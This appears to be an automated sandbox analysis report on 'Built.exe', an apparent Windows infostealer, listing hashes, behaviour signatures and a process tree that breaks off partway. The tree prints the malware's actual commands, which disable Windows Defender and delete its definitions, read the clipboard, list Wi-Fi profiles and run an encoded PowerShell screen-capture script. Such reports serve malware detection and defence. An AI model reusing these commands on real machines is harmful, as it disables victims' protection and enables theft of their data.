Analysis
-
max time kernel
99s -
max time network
140s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
13-11-2024 02:32
Behavioral task
behavioral1
Sample
Built.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
Built.exe
-
Size
5.9MB
-
MD5
ac8e20547882296f34c2a0a0be2bb60c
-
SHA1
962ea35532ea573851bbf43320334fb9d5b6e8a7
-
SHA256
9508813fad134520be5f13d47abfd12cc2aed421a44435735c1731002fb607b8
-
SHA512
d484a03dea102b4cebba9f64a63a9c773ffdf3c541f1e6c3f12bd8e4e273dbfdc8aa7910505b3cbe59d9b6242690d4be34e58e01eb86d2c87bfe7eb959f422fb
-
SSDEEP
98304:ohDe7pzWq348MMhJMjarCtaCObO/OH9KkqQz4W1kgeDDFMGe3RM+a:osNzWIB6yA+KO0WRqiGp+a
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 1116 MpCmdRun.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1036 powershell.exe 396 powershell.exe 792 powershell.exe 3956 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Built.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 5100 powershell.exe 4736 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2880 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 2500 Built.exe 2500 Built.exe 2500 Built.exe 2500 Built.exe 2500 Built.exe 2500 Built.exe 2500 Built.exe 2500 Built.exe 2500 Built.exe 2500 Built.exe 2500 Built.exe 2500 Built.exe 2500 Built.exe 2500 Built.exe 2500 Built.exe 2500 Built.exe 2500 Built.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 20 discord.com 21 discord.com 40 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 3760 tasklist.exe 2084 tasklist.exe 2964 tasklist.exe 1044 tasklist.exe -
resource yara_rule behavioral1/files/0x00280000000451b4-21.dat upx behavioral1/memory/2500-25-0x00007FFBC4140000-0x00007FFBC45A6000-memory.dmp upx behavioral1/files/0x00280000000451a7-27.dat upx behavioral1/files/0x00280000000451b2-29.dat upx behavioral1/memory/2500-48-0x00007FFBDCC60000-0x00007FFBDCC6F000-memory.dmp upx behavioral1/files/0x00280000000451ae-47.dat upx behavioral1/files/0x00280000000451ad-46.dat upx behavioral1/files/0x00280000000451ac-45.dat upx behavioral1/files/0x00280000000451ab-44.dat upx behavioral1/files/0x00280000000451aa-43.dat upx behavioral1/files/0x00280000000451a9-42.dat upx behavioral1/files/0x00280000000451a8-41.dat upx behavioral1/files/0x00280000000451a6-40.dat upx behavioral1/files/0x00280000000451b9-39.dat upx behavioral1/files/0x00280000000451b8-38.dat upx behavioral1/files/0x00280000000451b7-37.dat upx behavioral1/files/0x00280000000451b3-34.dat upx behavioral1/files/0x00280000000451b1-33.dat upx behavioral1/memory/2500-30-0x00007FFBD3820000-0x00007FFBD3844000-memory.dmp upx behavioral1/memory/2500-56-0x00007FFBD3800000-0x00007FFBD3818000-memory.dmp upx behavioral1/memory/2500-55-0x00007FFBD2EA0000-0x00007FFBD2ECC000-memory.dmp upx behavioral1/memory/2500-58-0x00007FFBD36E0000-0x00007FFBD36FF000-memory.dmp upx behavioral1/memory/2500-60-0x00007FFBC3DA0000-0x00007FFBC3F1D000-memory.dmp upx behavioral1/memory/2500-62-0x00007FFBD29D0000-0x00007FFBD29E9000-memory.dmp upx behavioral1/memory/2500-64-0x00007FFBD3B40000-0x00007FFBD3B4D000-memory.dmp upx behavioral1/memory/2500-66-0x00007FFBD1460000-0x00007FFBD148E000-memory.dmp upx behavioral1/memory/2500-73-0x00007FFBC32C0000-0x00007FFBC3635000-memory.dmp upx behavioral1/memory/2500-74-0x00007FFBD3820000-0x00007FFBD3844000-memory.dmp upx behavioral1/memory/2500-81-0x00007FFBC31A0000-0x00007FFBC32B8000-memory.dmp upx behavioral1/memory/2500-80-0x00007FFBD3800000-0x00007FFBD3818000-memory.dmp upx behavioral1/memory/2500-82-0x00007FFBD36E0000-0x00007FFBD36FF000-memory.dmp upx behavioral1/memory/2500-78-0x00007FFBD3230000-0x00007FFBD323D000-memory.dmp upx behavioral1/memory/2500-76-0x00007FFBCE1D0000-0x00007FFBCE1E5000-memory.dmp upx behavioral1/memory/2500-71-0x00007FFBC3640000-0x00007FFBC36F8000-memory.dmp upx behavioral1/memory/2500-70-0x00007FFBC4140000-0x00007FFBC45A6000-memory.dmp upx behavioral1/memory/2500-173-0x00007FFBC3DA0000-0x00007FFBC3F1D000-memory.dmp upx behavioral1/memory/2500-192-0x00007FFBD29D0000-0x00007FFBD29E9000-memory.dmp upx behavioral1/memory/2500-268-0x00007FFBD1460000-0x00007FFBD148E000-memory.dmp upx behavioral1/memory/2500-283-0x00007FFBC3640000-0x00007FFBC36F8000-memory.dmp upx behavioral1/memory/2500-298-0x00007FFBC32C0000-0x00007FFBC3635000-memory.dmp upx behavioral1/memory/2500-325-0x00007FFBD36E0000-0x00007FFBD36FF000-memory.dmp upx behavioral1/memory/2500-321-0x00007FFBD3820000-0x00007FFBD3844000-memory.dmp upx behavioral1/memory/2500-326-0x00007FFBC3DA0000-0x00007FFBC3F1D000-memory.dmp upx behavioral1/memory/2500-320-0x00007FFBC4140000-0x00007FFBC45A6000-memory.dmp upx behavioral1/memory/2500-335-0x00007FFBC4140000-0x00007FFBC45A6000-memory.dmp upx behavioral1/memory/2500-440-0x00007FFBC32C0000-0x00007FFBC3635000-memory.dmp upx behavioral1/memory/2500-445-0x00007FFBD36E0000-0x00007FFBD36FF000-memory.dmp upx behavioral1/memory/2500-454-0x00007FFBC31A0000-0x00007FFBC32B8000-memory.dmp upx behavioral1/memory/2500-453-0x00007FFBD3230000-0x00007FFBD323D000-memory.dmp upx behavioral1/memory/2500-452-0x00007FFBCE1D0000-0x00007FFBCE1E5000-memory.dmp upx behavioral1/memory/2500-451-0x00007FFBC4140000-0x00007FFBC45A6000-memory.dmp upx behavioral1/memory/2500-450-0x00007FFBC3640000-0x00007FFBC36F8000-memory.dmp upx behavioral1/memory/2500-449-0x00007FFBD1460000-0x00007FFBD148E000-memory.dmp upx behavioral1/memory/2500-448-0x00007FFBD3B40000-0x00007FFBD3B4D000-memory.dmp upx behavioral1/memory/2500-447-0x00007FFBD29D0000-0x00007FFBD29E9000-memory.dmp upx behavioral1/memory/2500-446-0x00007FFBC3DA0000-0x00007FFBC3F1D000-memory.dmp upx behavioral1/memory/2500-444-0x00007FFBD2EA0000-0x00007FFBD2ECC000-memory.dmp upx behavioral1/memory/2500-443-0x00007FFBD3800000-0x00007FFBD3818000-memory.dmp upx behavioral1/memory/2500-442-0x00007FFBDCC60000-0x00007FFBDCC6F000-memory.dmp upx behavioral1/memory/2500-441-0x00007FFBD3820000-0x00007FFBD3844000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4080 cmd.exe 2908 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4052 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1744 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 3956 powershell.exe 1036 powershell.exe 1452 WMIC.exe 1452 WMIC.exe 1452 WMIC.exe 1452 WMIC.exe 5100 powershell.exe 5100 powershell.exe 3956 powershell.exe 1036 powershell.exe 3956 powershell.exe 1036 powershell.exe 5100 powershell.exe 2088 powershell.exe 2088 powershell.exe 2088 powershell.exe 396 powershell.exe 396 powershell.exe 4520 powershell.exe 4520 powershell.exe 388 WMIC.exe 388 WMIC.exe 388 WMIC.exe 388 WMIC.exe 1960 WMIC.exe 1960 WMIC.exe 1960 WMIC.exe 1960 WMIC.exe 3384 WMIC.exe 3384 WMIC.exe 3384 WMIC.exe 3384 WMIC.exe 792 powershell.exe 792 powershell.exe 4052 WMIC.exe 4052 WMIC.exe 4052 WMIC.exe 4052 WMIC.exe 932 powershell.exe 932 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3956 powershell.exe Token: SeDebugPrivilege 1036 powershell.exe Token: SeDebugPrivilege 3760 tasklist.exe Token: SeDebugPrivilege 2084 tasklist.exe Token: SeDebugPrivilege 5100 powershell.exe Token: SeIncreaseQuotaPrivilege 1452 WMIC.exe Token: SeSecurityPrivilege 1452 WMIC.exe Token: SeTakeOwnershipPrivilege 1452 WMIC.exe Token: SeLoadDriverPrivilege 1452 WMIC.exe Token: SeSystemProfilePrivilege 1452 WMIC.exe Token: SeSystemtimePrivilege 1452 WMIC.exe Token: SeProfSingleProcessPrivilege 1452 WMIC.exe Token: SeIncBasePriorityPrivilege 1452 WMIC.exe Token: SeCreatePagefilePrivilege 1452 WMIC.exe Token: SeBackupPrivilege 1452 WMIC.exe Token: SeRestorePrivilege 1452 WMIC.exe Token: SeShutdownPrivilege 1452 WMIC.exe Token: SeDebugPrivilege 1452 WMIC.exe Token: SeSystemEnvironmentPrivilege 1452 WMIC.exe Token: SeRemoteShutdownPrivilege 1452 WMIC.exe Token: SeUndockPrivilege 1452 WMIC.exe Token: SeManageVolumePrivilege 1452 WMIC.exe Token: 33 1452 WMIC.exe Token: 34 1452 WMIC.exe Token: 35 1452 WMIC.exe Token: 36 1452 WMIC.exe Token: SeDebugPrivilege 2964 tasklist.exe Token: SeIncreaseQuotaPrivilege 1452 WMIC.exe Token: SeSecurityPrivilege 1452 WMIC.exe Token: SeTakeOwnershipPrivilege 1452 WMIC.exe Token: SeLoadDriverPrivilege 1452 WMIC.exe Token: SeSystemProfilePrivilege 1452 WMIC.exe Token: SeSystemtimePrivilege 1452 WMIC.exe Token: SeProfSingleProcessPrivilege 1452 WMIC.exe Token: SeIncBasePriorityPrivilege 1452 WMIC.exe Token: SeCreatePagefilePrivilege 1452 WMIC.exe Token: SeBackupPrivilege 1452 WMIC.exe Token: SeRestorePrivilege 1452 WMIC.exe Token: SeShutdownPrivilege 1452 WMIC.exe Token: SeDebugPrivilege 1452 WMIC.exe Token: SeSystemEnvironmentPrivilege 1452 WMIC.exe Token: SeRemoteShutdownPrivilege 1452 WMIC.exe Token: SeUndockPrivilege 1452 WMIC.exe Token: SeManageVolumePrivilege 1452 WMIC.exe Token: 33 1452 WMIC.exe Token: 34 1452 WMIC.exe Token: 35 1452 WMIC.exe Token: 36 1452 WMIC.exe Token: SeDebugPrivilege 2088 powershell.exe Token: SeIncreaseQuotaPrivilege 1036 powershell.exe Token: SeSecurityPrivilege 1036 powershell.exe Token: SeTakeOwnershipPrivilege 1036 powershell.exe Token: SeLoadDriverPrivilege 1036 powershell.exe Token: SeSystemProfilePrivilege 1036 powershell.exe Token: SeSystemtimePrivilege 1036 powershell.exe Token: SeProfSingleProcessPrivilege 1036 powershell.exe Token: SeIncBasePriorityPrivilege 1036 powershell.exe Token: SeCreatePagefilePrivilege 1036 powershell.exe Token: SeBackupPrivilege 1036 powershell.exe Token: SeRestorePrivilege 1036 powershell.exe Token: SeShutdownPrivilege 1036 powershell.exe Token: SeDebugPrivilege 1036 powershell.exe Token: SeSystemEnvironmentPrivilege 1036 powershell.exe Token: SeRemoteShutdownPrivilege 1036 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1404 wrote to memory of 2500 1404 Built.exe 82 PID 1404 wrote to memory of 2500 1404 Built.exe 82 PID 2500 wrote to memory of 4804 2500 Built.exe 84 PID 2500 wrote to memory of 4804 2500 Built.exe 84 PID 2500 wrote to memory of 3208 2500 Built.exe 85 PID 2500 wrote to memory of 3208 2500 Built.exe 85 PID 3208 wrote to memory of 3956 3208 cmd.exe 88 PID 3208 wrote to memory of 3956 3208 cmd.exe 88 PID 4804 wrote to memory of 1036 4804 cmd.exe 89 PID 4804 wrote to memory of 1036 4804 cmd.exe 89 PID 2500 wrote to memory of 1716 2500 Built.exe 90 PID 2500 wrote to memory of 1716 2500 Built.exe 90 PID 2500 wrote to memory of 2372 2500 Built.exe 91 PID 2500 wrote to memory of 2372 2500 Built.exe 91 PID 2500 wrote to memory of 2880 2500 Built.exe 94 PID 2500 wrote to memory of 2880 2500 Built.exe 94 PID 2500 wrote to memory of 4736 2500 Built.exe 95 PID 2500 wrote to memory of 4736 2500 Built.exe 95 PID 2500 wrote to memory of 1892 2500 Built.exe 96 PID 2500 wrote to memory of 1892 2500 Built.exe 96 PID 1716 wrote to memory of 3760 1716 cmd.exe 100 PID 1716 wrote to memory of 3760 1716 cmd.exe 100 PID 2372 wrote to memory of 2084 2372 cmd.exe 101 PID 2372 wrote to memory of 2084 2372 cmd.exe 101 PID 2500 wrote to memory of 4708 2500 Built.exe 102 PID 2500 wrote to memory of 4708 2500 Built.exe 102 PID 2500 wrote to memory of 4080 2500 Built.exe 103 PID 2500 wrote to memory of 4080 2500 Built.exe 103 PID 4736 wrote to memory of 5100 4736 cmd.exe 106 PID 4736 wrote to memory of 5100 4736 cmd.exe 106 PID 2500 wrote to memory of 3744 2500 Built.exe 107 PID 2500 wrote to memory of 3744 2500 Built.exe 107 PID 2500 wrote to memory of 2668 2500 Built.exe 109 PID 2500 wrote to memory of 2668 2500 Built.exe 109 PID 2880 wrote to memory of 1452 2880 cmd.exe 110 PID 2880 wrote to memory of 1452 2880 cmd.exe 110 PID 2500 wrote to memory of 3288 2500 Built.exe 112 PID 2500 wrote to memory of 3288 2500 Built.exe 112 PID 1892 wrote to memory of 2964 1892 cmd.exe 114 PID 1892 wrote to memory of 2964 1892 cmd.exe 114 PID 4708 wrote to memory of 3960 4708 cmd.exe 139 PID 4708 wrote to memory of 3960 4708 cmd.exe 139 PID 4080 wrote to memory of 2908 4080 cmd.exe 117 PID 4080 wrote to memory of 2908 4080 cmd.exe 117 PID 3288 wrote to memory of 2088 3288 cmd.exe 118 PID 3288 wrote to memory of 2088 3288 cmd.exe 118 PID 3744 wrote to memory of 1744 3744 cmd.exe 119 PID 3744 wrote to memory of 1744 3744 cmd.exe 119 PID 2668 wrote to memory of 1644 2668 cmd.exe 120 PID 2668 wrote to memory of 1644 2668 cmd.exe 120 PID 2500 wrote to memory of 1972 2500 Built.exe 121 PID 2500 wrote to memory of 1972 2500 Built.exe 121 PID 1972 wrote to memory of 4796 1972 cmd.exe 123 PID 1972 wrote to memory of 4796 1972 cmd.exe 123 PID 2500 wrote to memory of 4132 2500 Built.exe 124 PID 2500 wrote to memory of 4132 2500 Built.exe 124 PID 2500 wrote to memory of 1100 2500 Built.exe 127 PID 2500 wrote to memory of 1100 2500 Built.exe 127 PID 4132 wrote to memory of 2564 4132 cmd.exe 129 PID 4132 wrote to memory of 2564 4132 cmd.exe 129 PID 1100 wrote to memory of 3592 1100 cmd.exe 130 PID 1100 wrote to memory of 3592 1100 cmd.exe 130 PID 2500 wrote to memory of 3520 2500 Built.exe 131 PID 2500 wrote to memory of 3520 2500 Built.exe 131 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 3592 attrib.exe 3960 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3956
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:1116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:3960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1744
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:1644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:3288 -
